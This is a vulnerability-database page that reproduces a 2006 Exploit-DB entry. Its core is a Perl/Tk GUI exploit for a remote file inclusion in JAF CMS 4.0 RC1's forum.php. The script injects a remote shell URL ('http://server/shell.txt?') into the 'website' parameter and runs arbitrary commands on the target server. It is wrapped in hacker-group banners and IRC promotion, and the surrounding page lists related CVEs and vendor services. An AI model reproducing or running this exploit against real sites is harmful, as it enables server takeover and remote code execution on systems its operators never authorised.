Lucene search
+L

JAF CMS 4.0 RC1 - 'forum.php' Remote File Inclusion

🗓️ 03 Oct 2006 00:00:00Reported by KacperType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 35 Views

JAF CMS 4.0 RC1 Remote File Inclusio

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2006-7128
26 Mar 200800:00
circl
circl
Circl
CVE-2008-1609
26 Mar 200800:00
circl
cve
CVE
CVE-2006-7128
6 Mar 200701:00
cve
cve
CVE
CVE-2008-1609
1 Apr 200816:00
cve
cvelist
Cvelist
CVE-2006-7128
6 Mar 200701:00
cvelist
cvelist
Cvelist
CVE-2008-1609
1 Apr 200816:00
cvelist
exploitdb
Exploit DB
JAF CMS 4.0 RC1 - Multiple Remote File Inclusions
4 Oct 200600:00
exploitdb
exploitdb
Exploit DB
JAF CMS 4.0 RC2 - Multiple Remote File Inclusions
26 Mar 200800:00
exploitdb
euvd
EUVD
EUVD-2006-7110
7 Oct 202500:30
euvd
htbridge
htbridge
Multiple Vulnerabilities in JAF CMS
21 Oct 201000:00
htbridge
Rows per page
#!/usr/bin/perl

#:::::::::  :::::::::: :::     ::: ::::::::::: :::
#:+:    :+: :+:        :+:     :+:     :+:     :+:
#+:+    +:+ +:+        +:+     +:+     +:+     +:+
#+#+    +:+ +#++:++#   +#+     +:+     +#+     +#+
#+#+    +#+ +#+         +#+   +#+      +#+     +#+
##+#    #+# #+#          #+#+#+#       #+#     #+#
##########  ##########     ###     ########### ##########
#::::::::::: ::::::::::     :::     ::::    ::::
#    :+:     :+:          :+: :+:   +:+:+: :+:+:+
#    +:+     +:+         +:+   +:+  +:+ +:+:+ +:+
#    +#+     +#++:++#   +#++:++#++: +#+  +:+  +#+
#    +#+     +#+        +#+     +#+ +#+       +#+
#    #+#     #+#        #+#     #+# #+#       #+#
#    ###     ########## ###     ### ###       ###
#
#
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-   - - [DEVIL TEAM THE BEST POLISH TEAM] - -
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- JAF CMS <= 4.0 RC1 Remote File Include Exploit
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- [Script name: JAF CMS 4.0 RC1
#- [Script site: http://sourceforge.net/project/showfiles.php?group_id=113192
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-          Find by: Kacper (a.k.a Rahim)
#+
#-    DEVIL TEAM IRC: 72.20.18.6:6667 #devilteam
#+
#-          Contact: [email protected]
#-                        or
#-           http://www.rahim.webd.pl/
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#- Special Greetz: DragonHeart ;-)
#- Ema: Leito, Leon, Adam, DeathSpeed, Drzewko, pepi, mivus
#-                 SkD, nukedclx, Ramzes
#-
#- Greetz for all users DEVIL TEAM IRC Channel !!
#!@ Przyjazni nie da sie zamienic na marne korzysci @!
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#+
#-            Z Dedykacja dla osoby,
#-         bez ktorej nie mogl bym zyc...
#-           K.C:* J.M (a.k.a Magaja)
#+
#+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

use Tk;
use Tk::DialogBox;
use LWP::UserAgent;


$mw = new MainWindow(title => "DEVIL TEAM :: JAF CMS <= 4.0 RC1 Remote File Include Exploit :: by Kacper ;-)  " );

$mw->geometry ( '500x300' ) ;
$mw->resizable(0,0);


$mw->Label(-text => 'JAF CMS <= 4.0 RC1 Remote File Include Exploit by Kacper', -font => '{Verdana} 7 bold',-foreground=>'blue')->pack();
$mw->Label(-text => '')->pack();

$fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;

$url = 'http://www.site.com/[JAF_path]/module/forum/forum.php?fd=hack&website=';
$shell_path = 'http://server/shell.txt?';
$cmd = 'ls -la';


$fleft->Label ( -text => 'Script Path: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'Shell Path: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$shell_path) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fleft->Label ( -text => 'CMD: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$cmd) ->pack ( -side => "top" , -anchor => 'w' ) ;

$fright->Label( -text => ' ')->pack();
$fleft->Label( -text => ' ')->pack();



$fright->Button(-text    => 'Exploit Include Vulnerability',
                -relief => "groove",
                -width => '30',
                -font => '{Verdana} 8 bold',
                -activeforeground => 'red',
                -command => \&akcja
               )->pack();


$fright->Label( -text => ' ')->pack();
$fright->Label( -text => 'Exploit coded by Kacper', -font => '{Verdana} 7')->pack();
$fright->Label( -text => 'DEVIL TEAM :: The Best Polish Team', -font => '{Verdana} 7')->pack();
$fright->Label( -text => 'http://www.rahim.webd.pl/', -font => '{Verdana} 7')->pack();


MainLoop();


sub akcja()
{

$InfoWindow=$mw->DialogBox(-title   => 'DEVIL TEAM :: Exploit by Kacper ;-) ', -buttons => ["OK"]);
$InfoWindow->add('Label', -text => 'Enter to DEVIL TEAM IRC CHANNEL: 72.20.18.6:6667 #devilteam', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'DEVIL TEAM SITE: http://www.rahim.webd.pl/', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => 'Greetz For my friends ;-)', -font => '{Verdana} 8')->pack;
$InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack;

system("start $url$shell_path$cmd");
$InfoWindow->Show();
}

# milw0rm.com [2006-10-03]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Sep 2016 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 27.5
EPSS0.41114
35